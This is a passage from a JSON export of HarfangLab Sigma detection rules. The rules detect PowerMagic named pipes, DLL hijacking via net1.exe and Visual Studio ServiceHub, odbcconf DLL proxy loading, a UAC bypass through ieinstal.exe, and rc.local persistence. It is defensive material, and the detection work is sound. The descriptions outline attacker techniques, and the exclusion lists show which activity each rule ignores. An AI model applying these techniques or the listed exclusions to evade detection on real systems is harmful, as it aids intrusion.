"content": "title: PowerMagic Malware Named Pipes Connected\nid: 805af355-29f7-4a14-9fe3-f7a80b0442c8\ndescription: |\n Detects the connection to a Named Pipe pertaining to the PowerMagic malware.\n PowerMagic is a Russian-developed espionage malware, that uses named pipes to communicate locally between its different components.\n Adversaries can use named pipes to allow different malware components to communicate with each other as well as to communicate with other infected hosts through the network via SMB.\n It is recommended to analyze actions taken by the process connecting to the named pipe and isolate infected systems if necessary.\nreferences:\n - https://securelist.com/bad-magic-apt/109087/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2023/03/24\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Malware.PowerMagic\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName:\n - '\\PipeMd'\n - '\\PipeCrDtMd'\n - '\\PipeDtMd'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "805af355-29f7-4a14-9fe3-f7a80b0442c8",
"rule_name": "PowerMagic Malware Named Pipes Connected",
"rule_description": "Detects the connection to a Named Pipe pertaining to the PowerMagic malware.\nPowerMagic is a Russian-developed espionage malware, that uses named pipes to communicate locally between its different components.\nAdversaries can use named pipes to allow different malware components to communicate with each other as well as to communicate with other infected hosts through the network via SMB.\nIt is recommended to analyze actions taken by the process connecting to the named pipe and isolate infected systems if necessary.\n",
"rule_creation_date": "2023-03-24",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "805b62d6-ab4d-48d9-b108-d72780a75680",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069887Z",
"creation_date": "2026-03-23T11:45:34.069889Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069894Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
"https://twitter.com/Kostastsale/status/1541930866959454208",
"https://attack.mitre.org/techniques/T1218/008/"
],
"name": "t1218_odbcconf_suspicious_dll_load.yml",
"content": "title: Suspicious DLL Loaded by odbcconf.exe\nid: 805b62d6-ab4d-48d9-b108-d72780a75680\ndescription: |\n Detects a suspicious DLL loaded by odbcconf.exe, a command-line tool that allows to configure ODBC drivers and data source names.\n Attackers can use odbcconf.exe to load their malicious DLLs.\n It is recommended to investigate the loaded library to determine the legitimacy of this action.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n - https://twitter.com/Kostastsale/status/1541930866959454208\n - https://attack.mitre.org/techniques/T1218/008/\ndate: 2022/06/30\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.008\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.LOLBin.Odbcconf\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName : 'odbcconf.exe'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'TeamViewer GmbH'\n - 'Citrix Systems, Inc.'\n - 'Bitdefender SRL'\n - 'Symantec Corporation'\n - 'McAfee, Inc.'\n\n exclusion_system_common_files:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Common Files\\System\\'\n - '?:\\Program Files (x86)\\Common Files\\System\\'\n\n exclusion_informix:\n ImageLoaded|startswith: '?:\\Program Files\\Informix Client-SDK\\bin\\'\n\n exclusion_bitdefender:\n ImageLoaded:\n - '?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\dlls_*\\atcuf??.dll'\n - '?:\\Program Files\\Bitdefender\\Endpoint Security\\bdhkm\\dlls_*\\bdhkm??.dll'\n\n exclusion_mysql:\n # C:\\Program Files (x86)\\MySQL\\Connector ODBC 3.51\\myodbc3S.dll\n ImageLoaded: '?:\\Program Files (x86)\\MySQL\\Connector ODBC *\\myodbc3S.dll'\n\n exclusion_oracle:\n ProcessCommandLine: '?:\\windows\\SysWOW64\\odbcconf.exe CONFIG* Oracle* DSN=*|Server=*'\n ImageLoaded:\n - '?:\\ProgramData\\App-V\\\\????????-????-????-????-????????????\\\\????????-????-????-????-????????????\\Root\\\\*.dll'\n - '?:\\oracle\\product\\\\*\\client*\\BIN\\\\*.dll'\n\n exclusion_mariadb:\n ImageLoaded: '?:\\Program Files (x86)\\MariaDB\\MariaDB ODBC Driver\\maodbc*.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "805b62d6-ab4d-48d9-b108-d72780a75680",
"rule_name": "Suspicious DLL Loaded by odbcconf.exe",
"rule_description": "Detects a suspicious DLL loaded by odbcconf.exe, a command-line tool that allows to configure ODBC drivers and data source names.\nAttackers can use odbcconf.exe to load their malicious DLLs.\nIt is recommended to investigate the loaded library to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-06-30",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "80817c0a-7bb5-410a-a3cd-83171dc0be80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095906Z",
"creation_date": "2026-03-23T11:45:34.095909Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095913Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_net1.yml",
"content": "title: DLL Hijacking via net1.exe\nid: 80817c0a-7bb5-410a-a3cd-83171dc0be80\ndescription: |\n Detects potential Windows DLL Hijacking via net1.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'net1.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\DSROLE.dll'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "80817c0a-7bb5-410a-a3cd-83171dc0be80",
"rule_name": "DLL Hijacking via net1.exe",
"rule_description": "Detects potential Windows DLL Hijacking via net1.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8093156c-fb61-4f53-a780-8596f8f72ffc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080953Z",
"creation_date": "2026-03-23T11:45:34.080961Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080965Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_servicehub_testwindowstorehost.yml",
"content": "title: DLL Hijacking via ServiceHub.TestWindowStoreHost.exe\nid: 8093156c-fb61-4f53-a780-8596f8f72ffc\ndescription: |\n Detects potential Windows DLL Hijacking via Visual Studio ServiceHub.TestWindowStoreHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ServiceHub.Host.CLR.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\TenioDL_core.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8093156c-fb61-4f53-a780-8596f8f72ffc",
"rule_name": "DLL Hijacking via ServiceHub.TestWindowStoreHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Visual Studio ServiceHub.TestWindowStoreHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "80aad0df-28c0-4698-ac2c-9be3629de78e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073742Z",
"creation_date": "2026-03-23T11:45:34.073745Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073749Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME"
],
"name": "t1548_002_post_uac_bypass_iieaxiadmininstaller.yml",
"content": "title: UAC Bypass Executed via IIEAxiAdminInstaller\nid: 80aad0df-28c0-4698-ac2c-9be3629de78e\ndescription: |\n Detects an unsigned process being spawned by 'ieinstal.exe'.\n As all Internet Explorer extensions are supposed to be signed, if 'ieinstal.exe' spawns an unsigned process, it is most probably the consequence of a UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process spawned by 'ieinstal.exe' to look for malicious content and subsequent malicious child processes.\nreferences:\n - https://github.com/hfiref0x/UACME\ndate: 2020/10/19\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\ieinstal.exe'\n\n exclusion_signed:\n Signed: 'true'\n\n exclusion_vcredist:\n # \"C:\\Users\\XXXX\\AppData\\Local\\Temp\\IDC2.tmp\\VCRedist.exe\"\n # old unsigned vcredist.exe...\n Image|endswith: '\\VCRedist.exe'\n\n exclusion_adobe:\n # C:\\Users\\XXXX\\AppData\\Local\\Temp\\IDC2.tmp\\AdobePlugin.exe\n Image|endswith: '\\AdobePlugin.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "80aad0df-28c0-4698-ac2c-9be3629de78e",
"rule_name": "UAC Bypass Executed via IIEAxiAdminInstaller",
"rule_description": "Detects an unsigned process being spawned by 'ieinstal.exe'.\nAs all Internet Explorer extensions are supposed to be signed, if 'ieinstal.exe' spawns an unsigned process, it is most probably the consequence of a UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process spawned by 'ieinstal.exe' to look for malicious content and subsequent malicious child processes.\n",
"rule_creation_date": "2020-10-19",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "80c6b401-983c-4576-bac5-ad2902f30c70",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.683660Z",
"creation_date": "2026-03-23T11:45:35.297636Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297641Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md#atomic-test-2---rccommon",
"https://attack.mitre.org/techniques/T1037/004/"
],
"name": "t1037_004_rc_local_modified_linux.yml",
"content": "title: RC Script rc.local Modified\nid: 80c6b401-983c-4576-bac5-ad2902f30c70\ndescription: |\n Detects an attempt to modify the RC script \"/etc/rc.local\".\n The \"/etc/rc.local\" file is a script that is used to perform system-level tasks during the boot process on Unix-like systems.\n Adversaries can establish persistence by adding a malicious binary path or shell commands to this file.\n It is recommended to download the RC script for analysis and to remove any potentially malicious binaries or shell commands.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md#atomic-test-2---rccommon\n - https://attack.mitre.org/techniques/T1037/004/\ndate: 2022/12/26\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1037.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/etc/rc.local'\n - '/etc/rc.d/rc.local'\n - TargetPath:\n - '/etc/rc.local'\n - '/etc/rc.d/rc.local'\n\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_cmp:\n ProcessCurrentDirectory|startswith: '/var/backups/'\n ProcessImage|endswith: '/cmp'\n ProcessParentName: 'passwd'\n ProcessGrandparentImage|endswith: '/run-parts'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n\n exclusion_docker:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "80c6b401-983c-4576-bac5-ad2902f30c70",
"rule_name": "RC Script rc.local Modified",
"rule_description": "Detects an attempt to modify the RC script \"/etc/rc.local\".\nThe \"/etc/rc.local\" file is a script that is used to perform system-level tasks during the boot process on Unix-like systems.\nAdversaries can establish persistence by adding a malicious binary path or shell commands to this file.\nIt is recommended to download the RC script for analysis and to remove any potentially malicious binaries or shell commands.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1037.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "80c7b1a3-29b3-4c45-8609-82e0738fb42c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603107Z",
"creation_date": "2026-03-23T11:45:34.603111Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603118Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf",
"https://www.notion.so",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1071_001_suspicious_url_to_notion.yml",
